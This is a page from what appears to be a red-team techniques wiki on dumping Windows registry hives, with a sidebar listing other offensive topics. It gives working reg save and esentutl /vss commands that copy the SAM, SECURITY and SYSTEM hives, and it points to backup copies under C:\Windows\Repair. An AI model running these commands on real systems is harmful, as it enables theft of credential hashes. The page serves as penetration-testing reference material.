Gibson> Download Garbage
  • Statement of purpose
  • Techniques
    • Intelligence Gathering
      • O365 Tenant ID
      • Internal domain enumeration
      • O365 email enumeration
      • Passive nmap (smap)
      • Large IP list handling
      • Host Enumeration
    • Initial Access
      • Mail scanning
      • VBA
    • Execution
      • DLL Hijacking
      • Windows LOLBINS
        • DLLs - LOLBIN Execution
        • Executables - LOLBIN Execution
        • Scripts - LOLBIN Execution
    • Privilege Escalation
      • Windows
        • Initial Enumeration
      • Linux
    • Defense Evasion
      • Clear windows event logs
      • Bypassing proxies and firewalls
      • Microsoft Windows Defender
    • Credential Access
      • Extract credentials from LSASS dump
      • Extract credentials from registry hives
      • LSA secrets extraction
      • Dumping LSASS.exe
      • Dumping registry hives
      • Dump the domain (Domain Controllers)
      • Browser cookies & passwords
      • Wi-Fi passwords
      • Clipboard
    • Infrastructure
    • Web application testing
      • XSS - Cross site scripting
        • Weaponising XSS
    • Other
      • Buffer Overflow resources
        • Buffer Overflow Python Template
        • Buffer Overflow Python Fuzzer
      • C Reverse Shell
      • Creating Tiered Storage in Windows 10
      • Default Credentials
    • Red Team Infrastructure
      • Cobalt Strike Team Server
      • Pre-redirector (free domains!)
      • HTTPS Redirector
      • Multi functional WebApp
      • Malleable C2 profiles
      • Gophish Docker reverse proxy
    • Malware
  • Tools
    • Tools
Powered by GitBook
On this page
  • Reg.exe utility
  • Essentutl.exe utility
  • VSSshadow.exe utility
  • Backups

Was this helpful?

  1. Techniques
  2. Credential Access

Dumping registry hives

Reg.exe utility

Built in windows utility

reg save hklm\system system
reg save hklm\security security
reg save hklm\sam sam

Essentutl.exe utility

Built in windows binary

esentutl.exe /y /vss C:\Windows\System32\config\SYSTEM /d c:\temp\SYSTEM
esentutl.exe /y /vss C:\Windows\System32\config\SECURITY /d c:\temp\security
esentutl.exe /y /vss C:\Windows\System32\config\SAM /d c:\temp\sam

VSSshadow.exe utility

Backups

In some scenario, registry haves are backed up to C:\Windows\Repair\*. This can be worth checking but will likely be out of date.

E.g. C:\Windows\Repair\SAM

PreviousDumping LSASS.exeNextDump the domain (Domain Controllers)

Last updated 4 years ago

Was this helpful?